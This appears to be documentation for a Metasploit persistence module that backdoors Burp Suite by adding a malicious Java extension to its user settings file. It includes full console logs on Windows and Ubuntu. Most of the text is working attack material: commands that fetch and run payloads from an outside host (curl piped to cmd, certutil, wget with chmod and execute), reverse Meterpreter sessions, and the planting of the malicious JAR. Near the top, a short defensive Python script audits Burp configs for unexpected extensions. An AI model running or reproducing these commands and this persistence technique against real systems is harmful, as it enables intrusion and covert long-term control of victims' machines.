Vulnerable Application
This module adds a malicious Java-based extension to the Burp Suite configuration file. When Burp is opened, the extension is loaded and the payload is executed.
Tested against Burp Suite Community Edition v2024.9.4, on Ubuntu Desktop 24.04. Tested against Burp Suite Community Edition v2025.12.3 on Windows 10.
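A defender-side check for the mechanism described above, as an added example that is not part of the module or its documentation: it walks a Burp user settings JSON file and reports extension entries whose JAR sits outside an approved directory. The extension_file key, the nesting of the sample, and the approved directory are assumptions about the settings format and the environment; the flagged path is the one written in the Ubuntu scenario on this page.

```python
import json
import posixpath
import re

# Constructed sample, shaped like a Burp user settings file. Assumption: each
# extension entry is a JSON object with an "extension_file" key. The nesting
# under "user_options" is also assumed, so the walker below ignores nesting.
SAMPLE_CONFIG = json.dumps({
    "user_options": {"extender": {"extensions": [
        {"name": "Approved Logger", "extension_type": "java", "loaded": True,
         "extension_file": "/opt/burp-extensions/logger.jar"},
        {"name": "KdqJR", "extension_type": "java", "loaded": True,
         "extension_file": "/home/ubuntu/Desktop//KdqJR.jar"},
    ]}}
})


def iter_extensions(node):
    """Yield every dict that carries an extension_file key, at any depth."""
    if isinstance(node, dict):
        if "extension_file" in node:
            yield node
        for value in node.values():
            yield from iter_extensions(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_extensions(value)


def normalize(path):
    """Unify separators, collapse '//' and '..', fold case on drive-letter paths."""
    p = posixpath.normpath(str(path).replace("\\", "/"))
    return p.lower() if re.match(r"^[A-Za-z]:/", p) else p


def audit_config(config_text, approved_dirs):
    """Return extension entries whose JAR lives outside every approved directory."""
    # A trailing slash stops "/opt/ext-other" from matching the root "/opt/ext".
    roots = [normalize(d).rstrip("/") + "/" for d in approved_dirs]
    findings = []
    for ext in iter_extensions(json.loads(config_text)):
        jar = normalize(ext["extension_file"])
        if not any(jar.startswith(root) for root in roots):
            findings.append({"name": ext.get("name"), "file": jar,
                             "loaded": ext.get("loaded")})
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG, ["/opt/burp-extensions"]):
        print("unexpected Burp extension:", finding)
```

Run it against each user's settings file (the CONFIG option below names the file the module edits) and compare the findings with the extensions that user actually installed.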
Verification Steps
1. Install Burp
2. Start msfconsole
3. Get an initial shell on *nix or Windows
4. Do: use exploit/multi/persistence/burp_extension
5. Do: set session #
6. Do: set writabledir <directory>
7. Do: run
8. Once the extension is installed, and Burp started, you should get a shell
Options
NAME
Name of the extension. If blank, a random name is chosen.
CONFIG
Config file location on target. This is a User Settings file that an extension can be added to.
WritableDir
A directory where we can write the extension
USER
User to target, or current user if blank
GRADLE
If action is set to build, the local location of the Gradle executable to build the extension with. Defaults to /usr/bin/gradle
Action
precompiled
Use pre-compiled bytecode, Gradle is not required
build
Build the extension locally with Gradle.
Scenarios
Burp 2025.12.3 on Windows 10, precompiled with Windows target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /VIFzePGTMLa1dcpTvMRQBg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55729) at 2026-01-16 05:24:25 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
Install Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 2
target => 2
msf exploit(multi/persistence/burp_extension) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9812
lport => 9812
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/v3fXAwPgMBDCL44G1aW0KQ %TEMP%\CYdTYFAds.exe & start /B %TEMP%\CYdTYFAds.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /v3fXAwPgMBDCL44G1aW0KQ
[*] Started reverse TCP handler on 1.1.1.1:9812
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: BuIwiN
[*] Creating JAR file
[*] Writing malicious extension to disk: c:\users\windows\desktop\BuIwiN.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116054809_default_2.2.2.2_burp.config.json_765439.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.4809/WIN10PROLICENSE_20260116.4809.rc
Launch Burp
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9812 -> 2.2.2.2:55876) at 2026-01-16 05:49:34 -0500
Burp 2025.12.3 on Windows 10, build with Java target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55900) at 2026-01-16 05:53:50 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
Install Persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9815
lport => 9815
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) >
[*] Started reverse TCP handler on 1.1.1.1:9815
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: IoWH
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-127808-hkcygo
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
Starting a Gradle Daemon (subsequent builds will be faster)
:clean UP-TO-DATE
:compileJava
:processResources
:classes
:jar
:assemble
:compileTestJava NO-SOURCE
:processTestResources NO-SOURCE
:testClasses UP-TO-DATE
:test NO-SOURCE
:check UP-TO-DATE
:build
BUILD SUCCESSFUL in 7s
4 actionable tasks: 3 executed, 1 up-to-date
[+] Successfully built the jar file /tmp/d20260116-127808-hkcygo/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: c:\users\windows\desktop\IoWH.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116060148_default_2.2.2.2_burp.config.json_518370.bin
Launch Burp
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.0148/WIN10PROLICENSE_20260116.0148.rc
[*] Sending stage (58073 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9815 -> 2.2.2.2:56020) at 2026-01-16 06:14:57 -0500
Burp 2025.12.3 on Ubuntu 24.04, precompiled with Linux target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO wThmilCQ --no-check-certificate http://1.1.1.1:8082/l; chmod +x wThmilCQ; ./wThmilCQ& disown
msf exploit(multi/script/web_delivery) >
[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:43276) at 2026-01-16 06:31:49 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 3.3.3.3
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
Install Persistence
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 1
target => 1
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9816
lport => 9816
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:9816
msf exploit(multi/persistence/burp_extension) >
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: KdqJR
[*] Creating JAR file
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//KdqJR.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116073105_default_3.3.3.3_burp.config.json_225090.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.3105/3.3.3.3_20260116.3105.rc
Launch Burp
[*] Sending stage (23404 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9816 -> 3.3.3.3:59798) at 2026-01-16 07:45:08 -0500
msf exploit(multi/persistence/burp_extension) >
Burp 2025.12.3 on Ubuntu 24.04, build with Java target
Initial Access
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO z9hg2BUt --no-check-certificate http://1.1.1.1:8082/l; chmod +x z9hg2BUt; ./z9hg2BUt& disown
msf exploit(multi/script/web_delivery) >
[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:59534) at 2026-01-16 07:54:07 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 3.3.3.3
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
Install Persistence
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9817
lport => 9817
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:9817
msf exploit(multi/persistence/burp_extension) >
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: YBFkQz
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-130356-yxz2cv
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
:clean UP-TO-DATE
:compileJava
:processResources
:classes
:jar
:assemble
:compileTestJava NO-SOURCE
:processTestResources NO-SOURCE
:testClasses UP-TO-DATE
:test NO-SOURCE
:check UP-TO-DATE
:build
BUILD SUCCESSFUL in 1s
4 actionable tasks: 3 executed, 1 up-to-date
[+] Successfully built the jar file /tmp/d20260116-130356-yxz2cv/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//YBFkQz.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116075456_default_3.3.3.3_burp.config.json_053290.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.5456/3.3.3.3_20260116.5456.rc
Launch Burp
[*] Sending stage (58073 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9817 -> 3.3.3.3:52712) at 2026-01-16 07:55:28 -0500